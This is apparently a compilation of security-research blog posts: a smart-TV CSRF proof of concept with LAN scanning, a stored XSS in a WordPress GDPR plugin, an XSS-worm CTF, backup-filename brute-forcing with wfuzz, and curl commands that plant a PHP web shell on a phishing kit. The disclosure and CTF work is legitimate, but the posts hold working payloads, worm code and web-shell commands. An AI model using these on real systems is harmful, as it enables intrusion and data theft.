img.id = ports[i];
img.name = ip;
img.onload = function () {
check = 1;
document.getElementById("tv_port").value = this.id;
document.getElementById("web_admin").value = "http://"+this.name+":"+this.id+"/web";
var code = "\
<script>\n\
function submitRequest() {\n\
var xhr = new XMLHttpRequest();\n\
xhr.open('GET', '"+"http://"+this.name+":"+this.id+"/web"+"/admin/setFriendlyName?name=%hostname%', true);\n\
xhr.send();\n\
}\n\
submitRequest();\n\
<\/script>";
document.getElementById("exploit_code").value = code;
document.getElementById("exploit_poc").href = "http://"+this.name+":"+this.id+"/web"+"/admin/setFriendlyName?name=%hostname%";
console.log(this.id);
};
document.body.appendChild(img);
setTimeout(function () {
this.continue;
}, 50);
}
var imgs = document.querySelectorAll('img');
for (var i = 0; i < imgs.length; i++) {
imgs[i].parentNode.removeChild(imgs[i]);
}
}
function get_tv_ip() {
var local_ip = document.getElementById("internal_ip").value;
var ips = ip_to_range(local_ip);
scan(ips);
}
function get_hue_ip() {
var xhr = new XMLHttpRequest();
xhr.open("GET", "https://discovery.meethue.com/")
xhr.send();
xhr.onreadystatechange = function(e) {
var hue_ip;
if (xhr.readyState === 4) {
var response = xhr.responseText;
var obj = JSON.parse(response);
hue_ip = obj[0].internalipaddress;
document.getElementById("internal_ip").value = hue_ip;
get_tv_ip();
}
}
}
function ip_to_range(ip) {
var ips = [];
var ip_parts = ip.split( '.' );
if( ip_parts.length !== 4 ) {
return false;
}
for( var i = 1; i < 255; i++ ) {
var tmp_ip = ip_parts[0] + '.' + ip_parts[1] + '.' + ip_parts[2] + '.' + i;
ips.push( tmp_ip );
}
return ips;
}
function get_ports_array(lowEnd, highEnd) {
var ports = [];
for (var i = lowEnd; i <= highEnd; i++) {
ports.push(i);
}
return ports;
}
function scan(ips) {
for (var i = 0; i < ips.length; i++) {
var ifrm = document.createElement("iframe");
ifrm.setAttribute("src", "http://"+ips[i]+":4123");
ifrm.style.width = "10px";
ifrm.style.height = "10px";
ifrm.id = ips[i];
ifrm.onload = function () {
var iframes = document.querySelectorAll('iframe');
for (var i = 0; i < iframes.length; i++) {
iframes[i].parentNode.removeChild(iframes[i]);
}
document.getElementById("tv_ip").value = this.id;
scan_tv_ports(this.id);
};
document.body.appendChild(ifrm);
setTimeout(function () {
this.continue;
}, 50);
}
}
</script>
</body>
</html>
The following demo is accelerated. The full port scan phase can take 5 - 10 minutes, but only because the PoC is not optimized for speed.
If the attacker is already in the same network as the smart TV, it would be much faster and easier to use Nmap or something like that.
Honestly, I didn’t have much time to do even a network scan or motivation to reverse engineer the firmware, but I believe there is much more to uncover. It would be an excellent topic for further research. I guess it’s just a matter of time until we see the first Smart TV Exploit Kit.
I decided to drop this one as a 0day since I couldn’t convince the vendor to release a fix in the past 90 days. Users can move smart appliances to a separate VLAN to be safe. Other than that, the TV itself is not that bad, and I’m somewhat satisfied with the purchase.
I have just recently joined a Detectify crowdsource team, and I must say the platform is impressive. So I promised myself that I would spend some of the weekends looking for WordPress vulnerabilities to contribute with modules to the scanner. For the vulnerability to be accepted, the plugin must have at least 200k installations.
I started browsing popular WP plugins, looking for ones that meet the criteria. After a while, I saw a GDPR plugin with 200,000+ active installations, and it caught my attention because I remember that there were some with critical vulnerabilities when the whole cookie consent thing was made mandatory and developers were racing with new plugins.
After checking the plugin page to see if there was any attack surface, one screenshot was interesting:
The description said: "Overview of the view and delete requests by your site’s visitors." This indicated a dashboard in the admin panel listing the GDPR "delete requests", including each user's email and IP address, which could be a potential attack vector.
After downloading the plugin and activating it in the DVWP docker container, I published a page (with the form) to request deletion of user data and began the black-box testing. Validation of the e-mail input was correct, but when I tried to spoof the IP address via X-Forwarded-For: 1.1.1.1"><img src=x onerror=alert(1)>, the XSS payload executed. What a surprise: it took me less than 10 minutes to find a "Blind XSS" vulnerability triggered in the context of a privileged user.
At that point, I finished the black-box testing and quickly moved to a source code review to locate the vulnerable code and continue with white-box testing. A quick grep revealed a database column `ip_address` varchar(255) NOT NULL, which was a nice surprise, because it meant the whole XSS payload could be stored. The IP address from the form is assigned via $request->setIpAddress(Helper::getClientIpAddress()); and getClientIpAddress() is a pretty standard function that checks several headers to deal with proxies and the like. What was confusing is that there was a self::validateIpAddress($ipAddress) call to validate the IP. The validateIpAddress() function:
/**
* Ensures an ip address is both a valid IP and does not fall within
* a private network range.
*
* @param string $ipAddress
* @return bool
*/
public static function validateIpAddress($ipAddress = '') {
if (strtolower($ipAddress) === 'unknown') {
return false;
}
// Generate ipv4 network address
$ipAddress = ip2long($ipAddress);
// If the ip is set and not equivalent to 255.255.255.255
if ($ipAddress !== false && $ipAddress !== -1) {
/**
* Make sure to get unsigned long representation of ip
* due to discrepancies between 32 and 64 bit OSes and
* signed numbers (ints default to signed in PHP)
*/
$ipAddress = sprintf('%u', $ipAddress);
// Do private network range checking
if ($ipAddress >= 0 && $ipAddress <= 50331647) return false;
if ($ipAddress >= 167772160 && $ipAddress <= 184549375) return false;
if ($ipAddress >= 2130706432 && $ipAddress <= 2147483647) return false;
if ($ipAddress >= 2851995648 && $ipAddress <= 2852061183) return false;
if ($ipAddress >= 2886729728 && $ipAddress <= 2887778303) return false;
if ($ipAddress >= 3221225984 && $ipAddress <= 3221226239) return false;
if ($ipAddress >= 3232235520 && $ipAddress <= 3232301055) return false;
if ($ipAddress >= 4294967040) return false;
}
return true;
}
After looking at the code for longer than I would like to admit, I realized that the whole logic is fundamentally flawed. The interesting part is the ip2long function, which converts an IPv4 address to its long integer representation, which is then checked against a list of known network ranges. But when the input is invalid, it returns false: ip2long ( string $ip ) : int|false. validateIpAddress() never catches that case, so while valid IPs are checked against the ranges, any invalid "IP" makes the function return true, resulting in the payload being stored in the database. And because the developer was confident in the check, the value is never escaped when retrieved from the database and rendered in the admin dashboard.
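The flaw is easy to reproduce outside PHP. Below is a rough Python re-creation of the same logic (the function names are mine, and ip2long is approximated with inet_aton, which behaves close enough for this purpose); note how an unparseable "IP" skips every range check and is reported as valid:

```python
import socket
import struct

def ip2long(ip: str):
    """Mimic PHP's ip2long(): an integer on success, False on invalid input."""
    try:
        return struct.unpack("!I", socket.inet_aton(ip))[0]
    except OSError:
        return False

def validate_ip_address(ip: str) -> bool:
    """Mirror of the plugin's flawed check: the False case falls through."""
    addr = ip2long(ip)
    if addr is not False:
        # One of the plugin's private-range checks, 192.168.0.0/16:
        if 3232235520 <= addr <= 3232301055:
            return False
    # BUG: an unparseable "IP" (e.g. an XSS payload) reaches this line
    return True

print(validate_ip_address("192.168.1.1"))                            # False
print(validate_ip_address('1.1.1.1"><img src=x onerror=alert(1)>'))  # True
```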
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: 0.0.0.0:31337
X-Forwarded-For: 1.1.1.1"><img src=x onerror=alert(1)>

action=wpgdprc_process_action&security=cccf5a60ec&data={"type":"access_request","email":"xss@example.com","consent":true}
The fix was released in version 1.5.6 by adding the missing check:
if ($ipAddress === false) {
return false;
}
The user input is now correctly escaped, but the IP address column is still varchar(255). Also, only the PATCH version was incremented instead of the MINOR version, so it's hard to track the percentage of updated plugins via the advanced WordPress statistics. It was arguably a correct decision version-wise, but bumping it to 1.6 would have been much better from a security point of view.
When checking WPScan to verify that it’s not a known vulnerability, I realized that this is, in fact, the (in)famous GDPR plugin, which resulted in a full compromise of hundreds/thousands of websites back in 2018. But I must say that I was impressed by the fast response & fix from the developer. Unfortunately for me, stored XSS is not a valid finding for Detectify. I did a quick recon for HackerOne in-scope items but didn’t find any hit. Maybe I will be lucky next time :)
By observing a spike in the “Downloads per day” graph during the week after the fix release, we can estimate that approximately ~50k websites updated the plugin, which is about 1/4 of all active installations. The stats are somewhat consistent with past releases and could indicate that we won’t see any more websites updating to the latest version, so it might be a good idea to spread the news.
| Date | Downloads |
|---|---|
| 2021-02-15 | 23541 |
| 2021-02-16 | 12869 |
| 2021-02-17 | 5757 |
| 2021-02-18 | 3964 |
| 2021-02-19 | 3107 |
| 2021-02-20 | 2076 |
| 2021-02-21 | 1808 |
| 2021-02-22 | 3192 |
wpscan.com/vulnerability/69655879-9fd5-49a3-96ce-81e43b8d8438
When the whole covid-19 thing started, I was somehow drawn to looking at various coronavirus world maps and watching the exponential growth of the pandemic unfold. It reminded me of the (in)famous MySpace "Samy worm" by Samy Kamkar. For those of you who have never heard of it: released on MySpace in 2005, it was the first publicly known self-propagating cross-site scripting worm, and over one million users ran the payload within a single day.
Since then, we have seen some other XSS worms, for example on Yahoo, Twitter, or Orkut. But nothing at the scale of the MySpace worm.
In 2008, @RSnake published “Diminutive XSS Worm Replication Contest” on sla.ckers.org. It was an awesome idea, but there was some backlash as well :(
But why am I talking about this? Well, in 2008, I was 16 years old. I knew only basic English, but I was lucky enough to be mentored by some of the best hackers in Czechia at the time. A couple of months after RSnake’s contest, one member of our community took the idea and created an interface where we could test our XSS worms and compete with others. It looked like this:
There were 200 bot accounts and we (~4 people) scored points by infecting them with our worms and marking them with our color & nick via CSRF. You can still find the pieces of the original web archived here and the XSS worm source here. It may sound weird, but this “contest”, writing XSS worms and payloads to steal cookies, is one of my happiest childhood memories :)
So one evening, when I was checking the coronavirus map, I had a big flashback and immediately started coding a remastered version. The thing is, I’m not a developer, so it took quite some time. In May 2020, I had a working Proof of Concept, which looked like this:
At that point, I realized that it’s scalable and I might be able to pull it off and write a CTF style contest for our upcoming OWASP Czech Chapter meeting. I did some research and decided to go with a simple Python Flask application and a cluster of puppeteer workers for the bots.
Then the situation with covid got worse, and we had to postpone the OWASP meeting, multiple times in fact, and eventually cancel the whole thing because of the lockdown. On the bright side, I had plenty of time for coding and polishing. So how does it work?
It’s fairly simple. The user registers with a nickname and team color and is then presented with a simple interface to send messages to bots. But here is the catch: each user has a limit of 13 messages. Based on the Swagger documentation, they need to write an XSS worm that leverages two CSRFs: one to change the bot’s color and the other to self-propagate via the bot’s unlimited private messages. The point of the limited number of messages is to force the users to design an efficient infection algorithm that spreads exponentially.
There is a grid of 1k boxes, which helps to visualize the bots: whether they are infected, and by whom. Users score points by infecting and reinfecting the bots and marking them with their team color.
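To get a feel for why the 13-message budget still allows full coverage, here is a toy simulation. The 1000 bots and the 13 seed messages come from the game; the relays-per-round figure is my assumption for the sketch. Each infected bot relays the worm to a few random victims per round, so growth is roughly geometric until the grid saturates:

```python
import random

BOTS = 1000          # grid of 1k boxes
SEED_MESSAGES = 13   # a human player may send only 13 messages
RELAYS_PER_ROUND = 3 # assumed: messages each infected bot sends per round

def simulate(rounds: int) -> int:
    """Return how many bots are infected after the given number of rounds."""
    random.seed(1)  # deterministic for illustration
    infected = set(random.sample(range(BOTS), SEED_MESSAGES))
    for _ in range(rounds):
        new = set()
        for _bot in infected:
            new.update(random.randrange(BOTS) for _ in range(RELAYS_PER_ROUND))
        infected |= new
    return len(infected)

for r in (1, 3, 5):
    print(r, simulate(r))
```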
The puppeteer cluster then reads the last received messages of each bot in a random sequence every X minutes. The cluster code looks like this; it just goes through the array in random order, authenticated with cookies:
const { Cluster } = require('puppeteer-cluster');
(async () => {
const cluster = await Cluster.launch({
concurrency: Cluster.CONCURRENCY_CONTEXT,
maxConcurrency: 5,
// puppeteerOptions: { headless: false },
// puppeteerOptions: { args: ['--no-sandbox'] },
timeout: 666,
monitor: true,
});
await cluster.task(async ({ page, data }) => {
const { url, id } = data;
await page.setCookie({
'value':id,
'domain': 'xssworm.dev',
'expires': Date.now() / 1000 + 10,
'name': '31p475~Yr37748-35r0h~7c3rr0C-ID',
'httpOnly': true
});
await page.setCookie({
'value':'correct-horse-battery-staple',
'domain': 'xssworm.dev',
'expires': Date.now() / 1000 + 10,
'name': 'secret',
'httpOnly': true
});
await page.goto(url);
await page.waitFor(666);
//const screen = await page.screenshot();
// Store screenshot, do something else
});
var array = Array.from({length: 1001}, (_, i) => [i, Math.random()]).sort((a, b) => a[1] - b[1]).map(([n, r]) => n)
for (var i = 0; i < array.length; i++) {
//console.log(array[i]);
var url = "https://xssworm.dev/read-message?id="+array[i];
cluster.queue({url, id:""+array[i]+""});
// many more pages
}
await cluster.idle();
await cluster.close();
})();
There are some basic rules for users. They should be able to write the self-propagating code in just 13 tries. Once their worm hits exponential growth, it should infect most of the victims.
After registration, users are presented with the Swagger documentation. They are supposed to write code that sends two POST requests: one to change the color of the victim, the other to replicate its own code and spread to another victim. The tricky part was application/x-www-form-urlencoded, as most of the contestants struggled to get the encoding right: either the ‘+’ sign was stripped, or the ‘#’ representing the hex value of the color was double-encoded.
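For illustration, Python's urllib.parse shows the same pitfall: in a form-urlencoded body, a raw '+' decodes to a space and '#' needs exactly one round of percent-encoding. The color and payload values below are made up:

```python
from urllib.parse import quote, urlencode

color = "#550bb1"
payload = "<script>1+1</script>"

# Naive concatenation: the server decodes '+' as a space, and '#'
# is easy to either leave raw or accidentally double-encode.
naive = "color=" + color + "&msg=" + payload

# Correct: percent-encode each value exactly once.
body = urlencode({"color": color, "msg": payload})
print(body)
```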
Only one player was able to write a functional self-spreading XSS worm in time and eventually won the whole competition. They designed three different algorithms, as they could register again and resend an updated version to 13 victims.
There are a lot of things to improve in my code. I used a rather strict Content Security Policy. The whole deployment should be in Docker. I was even thinking about implementing CSRF tokens and Twitter OAuth; for more experienced users, an XSS protection to bypass would be ideal. The thing I struggled with the most was how to prevent a race condition and enforce the limit on the number of messages a user can send :( But anyway, I’m glad that people enjoyed the challenge, even in those hard times.
Here you can check my Proof of Concept of the worm:
<script id="xss_worm">
// XSS worm .dev
// Self-replication contest
// Proof of Concept v1.0
var victims = 1000;
var team_color = "#550bb1";
var url = "https://xssworm.dev";
var infection_code = "<script id=\"xss_worm\">"+self_propagation()+"<\/script>";
infect_victim(team_color);
while (true) {
var victim_id = get_random_victim(victims);
spread_infection(victim_id,infection_code);
}
function get_random_victim(accounts_count) {
return Math.floor((Math.random() * accounts_count) + 1);
}
function infect_victim(color) {
var xhr = new XMLHttpRequest();
var params = "color="+color;
xhr.open("POST", url+"/update", true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.send(params);
}
function self_propagation(){
return document.getElementById("xss_worm").innerHTML;
}
function spread_infection(id,infection_code) {
var xhr = new XMLHttpRequest();
var params = "id="+id+"&msg="+encodeURIComponent(infection_code);
xhr.open("POST", url+"/send-message", true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.send(params);
}
</script>
You can check and try the website, as I will keep the infrastructure alive for a while, or you can deploy it locally, as the whole thing is open-source. I’m a little bit ashamed of my programming skills, but here you go: https://github.com/vavkamil/XSSworm.dev
A long time ago, I made a stupid decision to use WordPress for this blog about offensive website security. Since then, I have learned a lot. In the upcoming weeks, I will be releasing a plugin to defend against XML-RPC attacks and a guide on generating a static HTML site.
But today I would like to share an interesting vulnerability that I found in a popular WordPress plugin with 2+ million active installations. I was looking for an easy-to-use backup plugin and All-in-One WP Migration by ServMask seemed like a good choice.
This plugin exports your WordPress website including the database, media files, plugins and themes with no technical knowledge required. Move, transfer, copy, migrate, and backup a site with 1-click. Quick, easy, and reliable.
All-in-One WP Migration plugin description
After installing the plugin and creating the first backup, the filename didn't look too random. I was wondering if it could be guessed by an attacker and somehow downloaded without the authenticated access.
While checking the code, I found out that it's just a domain-date-time-rand(100,999).wpress and the backup itself was publicly accessible via vavkamil.cz/wp-content/ai1wm-backups/vavkamil.cz-20200324-214633-123.wpress
This seemed bad, but it would still require a huge amount of requests and pure luck to brute-force it. In the "wp-content/ai1wm-backups" folder, there were three additional files preventing directory listing:
Back then, I didn't know what a "web.config" was for, but I was able to download it. There was nothing useful in it; it's basically .htaccess for a Microsoft IIS server. Normally I would probably have stopped there, but I had just finished reading Permanent Record by Edward Snowden and remembered the metadata :)
By downloading the web.config file and checking the Last-Modified header, we can determine the exact date and time when the plugin was installed. Let's assume the user installs the All-in-One WP Migration plugin and creates a backup within the first 10 minutes after the installation. The attacker can then brute-force the backup file name with approximately 600k requests.
I quickly wrote a simple python script to extract the metadata and used wfuzz as a proof of concept:
wfuzz -c -z range,33-59 -z range,100-999 -X HEAD --sc 200 https://vavkamil.cz/wp-content/ai1wm-backups/vavkamil.cz-20200324-2146FUZZ-FUZ2Z.wpress
The wfuzz parameters can be slightly modified to add a reasonable delay between the installation and first backup creation, or you can just try pure luck.
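The ~600k figure is just the size of the search space: a 10-minute window has 600 one-second timestamps, each with 900 possible rand(100,999) suffixes. A small Python sketch enumerating the candidate names that wfuzz iterates over (the timestamp is the example one from above, and the helper name is mine):

```python
from datetime import datetime, timedelta

def backup_candidates(domain: str, installed: datetime, window_minutes: int = 10):
    """Yield candidate names: domain-YYYYMMDD-HHMMSS-rand(100,999).wpress."""
    for second in range(window_minutes * 60):
        ts = installed + timedelta(seconds=second)
        stamp = ts.strftime("%Y%m%d-%H%M%S")
        for r in range(100, 1000):
            yield f"{domain}-{stamp}-{r}.wpress"

# Installation time recovered from the Last-Modified header of web.config
installed = datetime(2020, 3, 24, 21, 46, 33)
names = list(backup_candidates("vavkamil.cz", installed))
print(len(names))  # 540000, i.e. roughly the ~600k mentioned above
```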
Now that the attacker can determine the backup file name and download it, they can use a .wpress extractor to dump the database content from the archive, or just install the plugin on a fresh website and import the backup.
It's worth mentioning that even if you uninstalled the plugin, the "ai1wm-backups" folder with all the backups was not deleted, and therefore you may still be vulnerable.
I scanned the hackerone/bugcrowd scopes for bug bounty hunting purposes and found ~20 blogs with the plugin installed, but I wasn't able to exploit any (mainly because I didn't want to bother them with a huge number of requests). On the other hand, I exploited a handful of websites during the responsible disclosure among my clients, and this blog was also vulnerable/exploitable.
I reported the issue to the author, and it was quickly fixed in version 7.15 ("Exclude web.config and .htaccess direct access from each other"). That means it's no longer possible to download the .htaccess file from IIS or the web.config file from Apache. Subsequent updates introduced further changes, and the backup file name is now more random.
Timeline:
UPDATE: 17th January 2020: Another landing page disabled.
UPDATE: 15th January 2020: I posted this to reddit.com/r/hacking and it seems like the mods didn't like it, they consider my blog post as a self-promotion and spam. Thank you!
You have been permanently banned from participating in r/hacking
You have been permanently banned from participating in r/ActLikeYouBelong
You have been permanently banned from participating in r/AskNetsec
Today was a good day: I received a phishing email to my Protonmail address. I don't have a copy of the email, as I reported it and later deleted it as spam. Thankfully, another security researcher took screenshots yesterday:
The phishing mail included a Bitly link (URL shortener). The nice thing about Bitly is that you can append a plus (+) character to the end of the URL and it will show you how many people clicked the link and where the redirect points:
More than 100 people had clicked the link by the time I received the phishing email. I was a little bored, so I started poking around. I quickly found a directory listing with the full source code:
The landing page was written in PHP. It was a fairly generic one, nothing out of the ordinary, except for a blocker.php file. It contained code to block security researchers and malware hunters based on IP ranges and user-agent strings. If any of them matched, the IP was denied access in .htaccess and added to a badbot.txt file for further investigation.
The fourth line got my attention, as it was very unique:
$ipa = $_SERVER['HTTP_CLIENT_IP']? $_SERVER['HTTP_CLIENT_IP'] : ($_SERVER['HTTP_X_FORWARDED_FOR'] ? $_SERVER['HTTP_X_FORWARDED_FOR'] : $_SERVER['REMOTE_ADDR'] );
$useragent = $_SERVER['HTTP_USER_AGENT'];
if(isset($_POST['gotcha'])){
blockBot($ipa);
}
The thing about web security is that you should never trust user input. In this case, you can spoof both the HTTP_CLIENT_IP and HTTP_X_FORWARDED_FOR headers.
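For example, with Python's urllib you can construct such a spoofed request yourself. The target URL below is a placeholder, and the request is only built here, not sent:

```python
import urllib.request

# Hypothetical target; both "IP" headers and the user-agent are attacker-chosen.
req = urllib.request.Request(
    "http://phishing.example/blocker.php",
    data=b"gotcha=1",
    headers={
        "Client-IP": "6.6.6.6",        # becomes $_SERVER['HTTP_CLIENT_IP']
        "X-Forwarded-For": "6.6.6.6",  # becomes $_SERVER['HTTP_X_FORWARDED_FOR']
        "User-Agent": "InfoSec",       # matches the bad-bot list, lands in badbot.txt
    },
)
print(req.get_method(), req.get_header("Client-ip"))
```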
If you called the blocker.php script with a POST request and a gotcha parameter, the IP address was blocked:
function blockBot($ip){
$bot = 'deny from '.$ip;
$myfile = file_put_contents('.htaccess', PHP_EOL.$bot.PHP_EOL , FILE_APPEND | LOCK_EX);
header('HTTP/1.0 404 Not Found');
die("<h1>404 Not Found</h1>The page that you have requested could not be found.");
}
If the user-agent matched any array value like InfoSec, Kaspersky, ..., the IP was added to badbot.txt:
foreach($bad as $zbal) {
if(stripos($useragent,$zbal) !== false) {
file_put_contents('badbot.txt', $ipa, FILE_APPEND | LOCK_EX);
blockBot($ipa);
}
}
So I quickly figured out that I could insert a PHP shell into badbot.txt and force .htaccess to execute .txt files as PHP, a trick from the 2000s used to hack insecure PHP uploads :)
Inserting a PHP web shell into badbot.txt (I learned this one from Sucuri):
curl $url/blocker.php -H "CLIENT-IP: <?php extract($_REQUEST);$a($b); ?> " -H "User-agent: InfoSec"
Forcing Apache to execute .txt as PHP via .htaccess:
curl $url/blocker.php -H "CLIENT-IP: \r\nAddType application/x-httpd-php .txt\r\n" -H "User-agent: google" --data "gotcha=1"
This can be a very nice CTF challenge, full source-code here: https://gist.github.com/vavkamil/b115ef829329f9fd3876c077e843641b
In the end, I was able to take down the phishing infrastructure in less than 30 minutes, and maybe saved someone from a compromise. Mess with the best, die like the rest!
Indicators of compromise (IoC):
OWASP Czech Chapter Meeting, Dec 11, 2019 ~ Brno
/assets/img/2019/12/an-introduction-to-the-router-exploit-kits.pdf
2019-12-11 - Kamil Vavra - An introduction to the router exploit kits, from the Czech OWASP chapter on Vimeo.